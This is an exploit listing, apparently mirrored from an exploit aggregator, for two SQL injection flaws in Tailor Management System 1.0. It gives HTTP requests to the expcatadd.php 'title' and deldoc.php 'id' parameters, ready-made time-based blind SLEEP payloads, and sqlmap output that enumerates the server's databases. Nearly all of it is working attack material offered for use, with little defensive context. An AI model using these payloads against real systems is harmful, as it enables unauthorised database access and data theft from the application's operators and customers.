Exploit for Tailor Management System 1.0 SQL Injection

Name: Exploit for Tailor Management System 1.0 SQL Injection
Rating: 5 (98 reviews)
2020-08-07 | CVSS 0.3
## https://sploitus.com/exploit?id=PACKETSTORM:158794
# Exploit Title: Tailor Management System 1.0 Multiple SQL Injection Vulnerabilities  
# Google Dork: N/A  
# Date: 06.08.2020  
# Exploit Author: Mucahit Karadag  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html  
# Version: 1.0  
# Tested on: Ubuntu Server 14.04.6 LTS  
# CVE : N/A  
  
###  
# Software Description:  
# Tailor Management Software. This Project was created in PHP MySQL using JavaScript, Ajax,   
# Bootstrap, HTML, CSS. The software has mainly covered information of the customers. This   
# tailor software can Manage booking, worker wages, suppliers and customers, and to measure   
#styles and payment history using web application.  
#  
# Vulnerabilitiy Description:  
# Tailor Management System 1.0 web application is vulnerable to  
# 2 different SQL injection vulnerabilities in multiple endpoints.  
###  
  
##  
## [SQL Injection Identified on "title" Parameter]  
##  
  
POST /tailor/expcatadd.php HTTP/1.1  
Host: TARGET  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 10  
Origin: http://TARGET  
DNT: 1  
Connection: close  
Referer: http://TARGET/tailor/expcatadd.php  
Cookie: PHPSESSID=f6nbmpss36vdiis4ldb2nl11h6  
Upgrade-Insecure-Requests: 1  
  
title=test  
  
  
# "title" parameter is vulnerable to SQL injection on HTTP POST rquest to /tailor/expcatadd.php endpoint.  
Here is PoC:  
---  
Parameter: title (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: title=test' AND (SELECT 1577 FROM (SELECT(SLEEP(5)))zVYP) AND 'UKwv'='UKwv  
---  
[20:34:49] [INFO] fetching database names  
[20:34:49] [INFO] fetching number of databases  
[20:34:49] [INFO] resumed: 5  
[20:34:49] [INFO] resumed: information_schema  
[20:34:49] [INFO] resumed: mysql  
[20:34:49] [INFO] resumed: performance_schema  
[20:34:49] [INFO] resumed: phpmyadmin  
[20:34:49] [INFO] resumed: tailor  
available databases [5]:  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
[*] tailor  
  
##  
## [SQL Injection Identified on "id" Parameter]  
##  
  
GET /tailor/deldoc.php?id=123123123 HTTP/1.1  
Host: 12.0.0.163  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Cookie: PHPSESSID=cfpvj5ehmrgdpl2d1gh5rc3p90  
Upgrade-Insecure-Requests: 1  
  
  
# "id" parameter is vulnerable to SQL injection on HTTP GET rquest to /tailor/deldoc.php?id= endpoint.  
Here is PoC:  
---  
Parameter: id (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=123123123' AND (SELECT 8657 FROM (SELECT(SLEEP(5)))bntA) AND 'ovvs'='ovvs  
---